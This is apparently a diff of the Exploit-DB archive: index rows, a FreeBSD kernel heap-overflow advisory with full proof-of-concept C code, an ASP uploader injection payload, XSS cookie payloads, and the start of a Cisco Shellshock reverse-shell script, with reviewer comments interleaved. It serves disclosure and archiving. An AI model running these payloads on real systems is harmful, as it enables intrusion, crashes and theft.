17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0 30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
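Review bot: the 34606 row gains an affected version ("2.4") in its title, but the visible part of this diff does not show where that version comes from. State in the commit message whether it was taken from 34606.txt, since the title is what readers search to decide whether an installed version is covered.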
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
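Review bot: the five added rows jump from 39562 to 39564 and from 39565 to 39568, so ids 39563, 39566 and 39567 have no row. If those entries are held back on purpose that is fine, but confirm that no rows were dropped when the CSV was regenerated.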


@ -40,7 +40,7 @@ This can be exploited to inject arbitrary ASP code.
Exploit : Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = " #F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P 
align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%>&lt;/textarea&gt;</TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian] [m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ... attacker can upload "cmd.asp" with this uploader and ...
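Review bot: the only change in this hunk is that the closing tag after <%=content%> went from a literal </TEXTAREA> to the entity-escaped, lower-cased &lt;/textarea&gt;, which looks like an HTML-escaping artifact of an export step rather than an edit to the advisory. This is an archived plain-text file and should keep the author's original bytes; revert the line and fix the step that introduced the entities.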


@ -50,7 +50,7 @@ create a topic:
userid:<input type=text name=user_id value=255>by default 255 is sa<br> userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumID:<input type=text name=ForumId value=><br> ForumID:<input type=text name=ForumId value=><br>
Subject:<input type=text name=Subject value="r3dm0v3."><br> Subject:<input type=text name=Subject value="r3dm0v3."><br>
Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br> Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.&lt;/textarea&gt;<br>
Icon:<input type=text name=Icon value=14><br> Icon:<input type=text name=Icon value=14><br>
Show Signature:<input type=text name=Showsignature value=0><br> Show Signature:<input type=text name=Showsignature value=0><br>
Notify:<input type=text name=Notify ><br> Notify:<input type=text name=Notify ><br>
@ -89,8 +89,8 @@ Add content:
Date:<input type=text name=DateAdded value="6/1/2008"><br> Date:<input type=text name=DateAdded value="6/1/2008"><br>
Author:<input type=text name=Author value=r3dm0v3><br> Author:<input type=text name=Author value=r3dm0v3><br>
title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br> title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br> ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.&lt;/textarea&gt;<br>
LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br> LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir&lt;/textarea&gt;<br>
relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br> relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
DownloadURL:<input type=text name=DownloadURL><br> DownloadURL:<input type=text name=DownloadURL><br>
Filename:<input type=text name=Filename><br> Filename:<input type=text name=Filename><br>
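Review bot: the ShortDesc and LongDesc lines here, like the Message line in the preceding hunk of this file, change only by turning </textarea> into &lt;/textarea&gt;, while every other tag on those lines (<br>, <input ...>, the opening <textarea ...>) is left raw. A pre-commit check that flags newly introduced &lt; or &gt; entities in files under platforms/ would catch this class of accidental rewrite before it lands.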


@ -1,4 +1,3 @@
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ | | _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | | /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |


@ -1,4 +1,3 @@
|| || | || || || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( . ( : / (_) / ( .


@ -16,7 +16,7 @@ onLoad="alert(document.cookie)[/sound]
###### ######
###### LINK XSS ###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img http://localhost/forum/pop_send_to_friend.asp?url=&lt;/textarea&gt;<img
src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
="alert(document.cookie)"> ="alert(document.cookie)">
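Review bot: on the LINK XSS line the url= sample is now half escaped: </textarea> became &lt;/textarea&gt; while the <img ...> that follows it is still raw. That mixed state indicates a targeted string substitution rather than a consistent encoding pass, and the recorded request no longer matches what the advisory documented, which matters to anyone deriving a WAF or IDS signature from this file. Revert to the original text.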


@ -0,0 +1,227 @@
/*
1. Advisory Information
Title: FreeBSD Kernel amd64_set_ldt Heap Overflow
Advisory ID: CORE-2016-0005
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow
Date published: 2016-03-16
Date of last update: 2016-03-14
Vendors contacted: FreeBSD
Release mode: Coordinated release
2. Vulnerability Information
Class: Unsigned to Signed Conversion Error [CWE-196]
Impact: Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2016-1885
3. Vulnerability Description
FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices.
An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system.
4. Vulnerable packages
FreeBSD 10.2 amd64.
Other amd64 versions may be affected too but they were no checked.
5. Non-vulnerable packages
FreeBSD 10.2-RELENG.
6. Vendor Information, Solutions and Workarounds
The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG.
7. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
8. Technical Description / Proof of Concept Code
8.1. FreeBSD amd64_set_ldt Integer Signedness Vulnerability
[CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS.
Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file:
int
sysarch(td, uap)
struct thread *td;
register struct sysarch_args *uap;
{
[...]
if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT)
return (sysarch_ldt(td, uap, UIO_USERSPACE));
[...]
As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall:
int
sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space)
{
struct i386_ldt_args *largs, la;
struct user_segment_descriptor *lp;
[...]
switch (uap->op) {
[...]
case I386_SET_LDT:
if (largs->descs != NULL && largs->num > max_ldt_segment)
return (EINVAL);
set_pcb_flags(td->td_pcb, PCB_FULL_IRET);
if (largs->descs != NULL) {
lp = malloc(largs->num * sizeof(struct
user_segment_descriptor), M_TEMP, M_WAITOK);
error = copyin(largs->descs, lp, largs->num *
sizeof(struct user_segment_descriptor));
if (error == 0)
error = amd64_set_ldt(td, largs, lp);
free(lp, M_TEMP);
} else {
error = amd64_set_ldt(td, largs, NULL);
}
break;
The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file:
struct i386_ldt_args {
unsigned int start;
union descriptor *descs;
unsigned int num;
};
Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode:
int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels);
From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called:
int
amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs);
amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed by the uap pointer is fully controlled from user mode):
int
amd64_set_ldt(td, uap, descs)
struct thread *td;
struct i386_ldt_args *uap;
struct user_segment_descriptor *descs;
{
[...]
int largest_ld;
[...]
608 if (descs == NULL) {
609 Free descriptors
610 if (uap->start == 0 && uap->num == 0)
611 uap->num = max_ldt_segment;
612 if (uap->num == 0)
613 return (EINVAL);
614 if ((pldt = mdp->md_ldt) == NULL ||
615 uap->start >= max_ldt_segment)
616 return (0);
617 largest_ld = uap->start + uap->num;
618 if (largest_ld > max_ldt_segment)
619 largest_ld = max_ldt_segment;
620 i = largest_ld - uap->start;
621 mtx_lock(&dt_lock);
622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623 [uap->start], sizeof(struct user_segment_descriptor) * i);
624 mtx_unlock(&dt_lock);
625 return (0);
626 }
The two if statements at lines 610 and 612 perform some sanity checks against uap->start and uap->num, which can be avoided by setting uap->num to a value different than 0. The next check at lines 614/615 will cause the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater or equal than max_ldt_segment (1024). Having mdp->md_ldt holding a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this:
struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};
i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
After passing those checks we reach the vulnerable code at lines 617-619:
617 largest_ld = uap->start + uap->num;
618 if (largest_ld > max_ldt_segment)
619 largest_ld = max_ldt_segment;
620 i = largest_ld - uap->start;
Note that largest_ld is a signed int that will hold the sum of uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, being largest_ld a signed integer holding a value fully controlled from user mode, it will perform a signed comparison that can be bypassed by setting uap->num to a negative number.
This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter:
622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623 [uap->start], sizeof(struct user_segment_descriptor) * i);
8.2. Proof of Concept
The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel:
*/
/* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */
#include <stdio.h>
#include <unistd.h>
#include <machine/segments.h>
#include <machine/sysarch.h>
#include <sysexits.h>
#include <err.h>
int main(int argc, char **argv){
int res;
struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};
printf("[+] Adding an initial entry to the process LDT...\n");
res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
if (res < 0){
err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)");
}
printf("returned index: %d\n", res);
printf("Triggering the bug...\n");
res = i386_set_ldt(1, NULL, 0x80000000);
}
/*
9. Report Timeline
2016-03-02: Core Security sent an initial notification to FreeBSD.
2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory.
2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the advisory in order to coordinate a publication date.
2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update.
2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week.
2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA.
2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID.
2016-03-16: Advisory CORE-2016-0005 published.
10. References
[1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE
[2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup
[3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup
11. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
12. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
13. Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
*/
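Review bot: section 8.1 says the check at lines 618-619 is bypassed "by setting uap->num to a negative number", but the i386_ldt_args struct quoted just above it declares num as unsigned int; the signedness problem sits in "int largest_ld" receiving the unsigned sum at line 617. With the PoC's own arguments (start 1, num 0x80000000) that sum is 0x80000001, which is negative as an int and so passes "largest_ld > max_ldt_segment". The excerpt also elides the declaration of i behind [...], so the reader cannot see from the quoted code how the length passed to bzero() at lines 622-623 ends up huge; include that declaration. Separately, the fix is given only as "FreeBSD 10.2-RELENG" with no patch level or vendor advisory reference, and "Date of last update" (2016-03-14) precedes "Date published" (2016-03-16); both are worth checking against the upstream advisory before archiving.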


@ -0,0 +1,65 @@
#!/usr/bin/python
###############################################
# Cisco UCS Manager 2.1(1b) Shellshock Exploit
#
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory:
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert
###############################################
import sys
import requests
import time
if len(sys.argv) < 4:
print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
print "[*]"
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
print "[*] Listener: nc -lvp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
